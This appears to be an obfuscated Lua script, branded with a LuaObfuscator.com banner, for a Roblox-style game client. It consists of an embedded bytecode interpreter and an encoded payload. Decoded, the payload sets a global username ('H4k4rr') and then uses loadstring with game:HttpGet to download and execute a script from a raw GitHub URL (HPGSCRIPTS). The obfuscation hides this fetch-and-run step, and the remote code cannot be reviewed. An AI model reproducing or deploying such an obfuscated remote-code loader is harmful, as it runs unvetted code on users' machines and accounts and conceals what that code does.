--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((5 -3)^(v32-((958 -(892 + 65)) -0))))%((4 -(4 -2))^(((v33-(620 -(555 + 64))) -(v32-(1 -0))) + ((1710 -778) -(857 + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=1270 -(226 + 1044) ;local v87;while true do if (v86==(927 -(214 + 713))) then v87=(119 -(32 + 85))^(v32-1) ;return (((v31%(v87 + v87))>=v87) and ((351 -(87 + 263)) + (180 -(67 + 113)))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1 -0)) then return (v38 * (12302277 + 4474939)) + (v37 * (160901 -95365)) + (v36 * (724 -468)) + v35 ;end if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (11 -8) );v19=v19 + 4 ;v34=953 -((1819 -1017) + (328 -178)) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if ((4 -3)==v39) then v42=nil;v43=nil;v39=700 -(208 + 490) ;end if ((1 + 2)==v39) then v46=nil;while true do local v95=0 + 0 ;local v96;while true do if (v95~=0) then else v96=836 -(660 + 176) ;while true do if (v96==1) then if (v40==(0 + 0)) then local v139=202 -(14 + 188) ;local v140;while true do if (v139~=0) then else v140=675 -(534 + 141) ;while true do if (v140~=(1 + 1)) then else v40=1 + 0 ;break;end if ((0 + 0)==v140) then v41={};v42={};v140=1 -0 ;end if (v140==1) then v43={};v44={v41,v42,nil,v43};v140=2;end end break;end end end break;end if (v96==0) then if (v40==(2 -1)) then local v141=0 + 0 ;while true do if (v141~=0) then else v45=v24();v46={};v141=1 + 0 ;end if (v141~=(398 -(115 + 281))) then else v40=4 -2 ;break;end if (1==v141) then for v160=1 + 0 ,v45 do local v161=0 -0 ;local v162;local v163;local v164;local v165;local v166;while true do if ((7 -5)==v161) then v166=nil;while true do if (v162==1) then local v176=867 -(550 + 317) ;while true do if (v176==1) then v162=2;break;end if (v176==0) then v165=nil;v166=nil;v176=1 -0 ;end end end if ((2 -0)==v162) then while true do if (v163==1) then v166=nil;while true do if (v164~=0) then else local v184=0 -0 ;local v185;while true do if (v184==0) then v185=285 -(134 + 151) ;while true do if (v185==(1665 -(970 + 695))) then local v193=0 -0 ;while true do if (v193==0) then local v196=0;while true do if (0==v196) then v165=v22();v166=nil;v196=1991 -(582 + 1408) ;end if (v196==1) then v193=1;break;end end end if (v193==(3 -2)) then v185=1;break;end end end if (v185~=(1 -0)) then else v164=3 -2 ;break;end end break;end end end if (v164~=1) then else if (v165==(1825 -(1195 + 629))) then v166=v22()~=(0 -0) ;elseif (v165==2) then v166=v25();elseif (v165~=(244 -(187 + 54))) then else v166=v26();end v46[v160]=v166;break;end end break;end if (v163~=(780 -(162 + 618))) then else local v178=0 + 0 ;while true do if (v178==1) then v163=1 + 0 ;break;end if (v178~=(0 -0)) then else v164=0 -0 ;v165=nil;v178=1;end end end end break;end if (0==v162) then local v177=0;while true do if (v177~=0) then else v163=0 + 0 ;v164=nil;v177=1637 -(1373 + 263) ;end if (v177==(1001 -(451 + 549))) then v162=1;break;end end end end break;end if (v161~=(0 + 0)) then else v162=0 -0 ;v163=nil;v161=1;end if (v161~=(1 -0)) then else v164=nil;v165=nil;v161=2;end end end v44[1387 -(746 + 638) ]=v22();v141=2;end end end if ((1 + 1)==v40) then local v142=0 -0 ;while true do if (1==v142) then return v44;end if ((341 -(218 + 123))==v142) then for v167=1582 -(1535 + 46) ,v24() do local v168=0;local v169;local v170;local v171;while true do if (v168==0) then v169=0;v170=nil;v168=1;end if (v168==(1 + 0)) then v171=nil;while true do if (v169==(1 + 0)) then while true do if (v170==0) then v171=v22();if (v21(v171,1,561 -(306 + 254) )~=0) then else local v179=0 + 0 ;local v180;local v181;local v182;local v183;while true do if (0~=v179) then else v180=0;v181=nil;v179=1 -0 ;end if (v179==(1469 -(899 + 568))) then while true do if (v180==(2 + 0)) then local v188=0 -0 ;while true do if (v188==1) then v180=3;break;end if (v188~=(603 -(268 + 335))) then else if (v21(v182,1,1)==1) then v183[292 -(60 + 230) ]=v46[v183[2]];end if (v21(v182,2,574 -(426 + 146) )~=(1 + 0)) then else v183[1459 -(282 + 1174) ]=v46[v183[3]];end v188=1;end end end if (v180==1) then local v189=811 -(569 + 242) ;while true do if (v189~=(0 -0)) then else v183={v23(),v23(),nil,nil};if (v181==0) then local v201=0;local v202;while true do if (v201~=0) then else v202=1251 -(721 + 530) ;while true do if (0~=v202) then else v183[1274 -(945 + 326) ]=v23();v183[9 -5 ]=v23();break;end end break;end end elseif (v181==1) then v183[3]=v24();elseif (v181==(2 + 0)) then v183[3]=v24() -((702 -(271 + 429))^(15 + 1)) ;elseif (v181~=(1503 -(1408 + 92))) then else local v207=1086 -(461 + 625) ;local v208;local v209;local v210;while true do if (v207==(1288 -(993 + 295))) then v208=0 + 0 ;v209=nil;v207=1;end if (v207==(1172 -(418 + 753))) then v210=nil;while true do if (v208~=(0 + 0)) then else local v211=0;while true do if (0~=v211) then else v209=0 + 0 ;v210=nil;v211=1 + 0 ;end if (v211==1) then v208=1;break;end end end if (v208==(1 + 0)) then while true do if (v209==0) then v210=529 -(406 + 123) ;while true do if (v210==(1769 -(1749 + 20))) then v183[1 + 2 ]=v24() -((1324 -(1249 + 73))^16) ;v183[2 + 2 ]=v23();break;end end break;end end break;end end break;end end end v189=1146 -(466 + 679) ;end if (1==v189) then v180=4 -2 ;break;end end end if (v180~=3) then else if (v21(v182,8 -5 ,3)~=1) then else v183[1904 -(106 + 1794) ]=v46[v183[4]];end v41[v167]=v183;break;end if (v180==(0 + 0)) then local v191=0;local v192;while true do if (v191~=0) then else v192=0 + 0 ;while true do if (v192~=0) then else v181=v21(v171,2,8 -5 );v182=v21(v171,10 -6 ,6);v192=115 -(4 + 110) ;end if (v192~=(585 -(57 + 527))) then else v180=1428 -(41 + 1386) ;break;end end break;end end end end break;end if (1~=v179) then else local v187=0;while true do if (v187~=(104 -(17 + 86))) then else v179=2 + 0 ;break;end if (v187==(0 -0)) then v182=nil;v183=nil;v187=1;end end end end end break;end end break;end if (v169==(0 -0)) then v170=166 -(122 + 44) ;v171=nil;v169=1 -0 ;end end break;end end end for v172=1,v24() do v42[v172-1 ]=v29();end v142=3 -2 ;end end end v96=1 + 0 ;end end break;end end end break;end if (v39==0) then v40=0;v41=nil;v39=1 + 0 ;end if (v39~=(3 -1)) then else v44=nil;v45=nil;v39=68 -(30 + 35) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1259 -(1043 + 214))) then v52=v21(v49,79 -58 ,1243 -(323 + 515 + 374) );v53=((v21(v49,85 -53 )==(581 -(361 + 219))) and  -(4 -3)) or (321 -(53 + 267)) ;v47=(1 -0) + 2 ;end if (v47==((784 -370) -(15 + 398))) then v50=1 -0 ;v51=(v21(v49,1 + 0 ,20 + 0 ) * ((2 + 0)^(1014 -(18 + 964)))) + v48 ;v47=7 -(243 -(64 + 174)) ;end if ((2 + 1)==v47) then if (v52==(0 + 0)) then if (v51==(0 -0)) then return v53 * (850 -(20 + 830)) ;else local v101=0 + 0 ;while true do if (v101==(126 -(116 + 10))) then v52=1 + 0 ;v50=738 -(542 + 196) ;break;end end end elseif (v52==(4387 -2340)) then return ((v51==(1329 -(797 + 532))) and (v53 * ((1 + 0)/(0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(520 + 503) ) * (v50 + (v51/((1 + 1 + 0)^((201 -65) -84)))) ;end if (v47==((1466 -(144 + 192)) -(369 + 761))) then v48=v24();v49=v24();v47=2 -1 ;end end end v26=nil;function v26(v54)local v55;if  not v54 then local v88=0;while true do if ((216 -(42 + 174))==v88) then v54=v24();if (v54==(0 + 0)) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -((1505 -(363 + 1141)) + 0) );v19=v19 + v54 ;local v56={};for v68=1 + 0 , #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=0;local v58;while true do if (v57==(1581 -(1183 + 397))) then return v58;end if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v57=1;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (1977 -(1913 + 62)) );v19=v19 + 2 + 0 ;return (v60 * (192 + 64)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v89=0;while true do if (v89==0) then v20=v0(v3(v61,1,1));return "";end end else local v90=0;local v91;while true do if (v90==0) then v91=v2(v0(v61,16));if v20 then local v102=v5(v91,v20);v20=nil;return v102;else return v91;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v92=0,v78 do if (v92>=v72) then v76[v92-v72 ]=v77[v92 + 1 ];else v80[v92]=v77[v92 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=4) then if (v83<=1) then if (v83==0) then do return;end elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end elseif (v83<=2) then v74=v82[3];elseif (v83==3) then v64[v82[3]]=v80[v82[2]];else local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==1) then v75=(v114 + v112) -1 ;v115=0;v111=2;end if (v111==0) then v112=v82[2];v113,v114=v73(v80[v112](v13(v80,v112 + 1 ,v82[3])));v111=1;end if (v111==2) then for v157=v112,v75 do local v158=0;while true do if (0==v158) then v115=v115 + 1 ;v80[v157]=v113[v115];break;end end end break;end end end elseif (v83<=7) then if (v83<=5) then v80[v82[2]]=v82[3];elseif (v83>6) then v80[v82[2]]();else local v116=0;local v117;while true do if (v116==0) then v117=v82[2];v80[v117]=v80[v117](v13(v80,v117 + 1 ,v75));break;end end end elseif (v83<=8) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83>9) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v82[2];v121=v80[v82[3]];v119=1;end if (v119==1) then v80[v120 + 1 ]=v121;v80[v120]=v121[v82[4]];break;end end else local v122;local v123,v124;local v125;local v126;v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v126=v82[2];v125=v80[v82[3]];v80[v126 + 1 ]=v125;v80[v126]=v125[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v126=v82[2];v123,v124=v73(v80[v126](v13(v80,v126 + 1 ,v82[3])));v75=(v124 + v126) -1 ;v122=0;for v136=v126,v75 do v122=v122 + 1 ;v80[v136]=v123[v122];end v74=v74 + 1 ;v82=v70[v74];v126=v82[2];v80[v126]=v80[v126](v13(v80,v126 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D6503063O0048346B342O72030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6C79706F73312F485047534352495054532F6D61696E2F48504753435249505453000F3O0012053O00013O0026083O0001000100010004023O00010001001205000100033O001209000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E00010004023O000100016O00017O00",v9(),...);
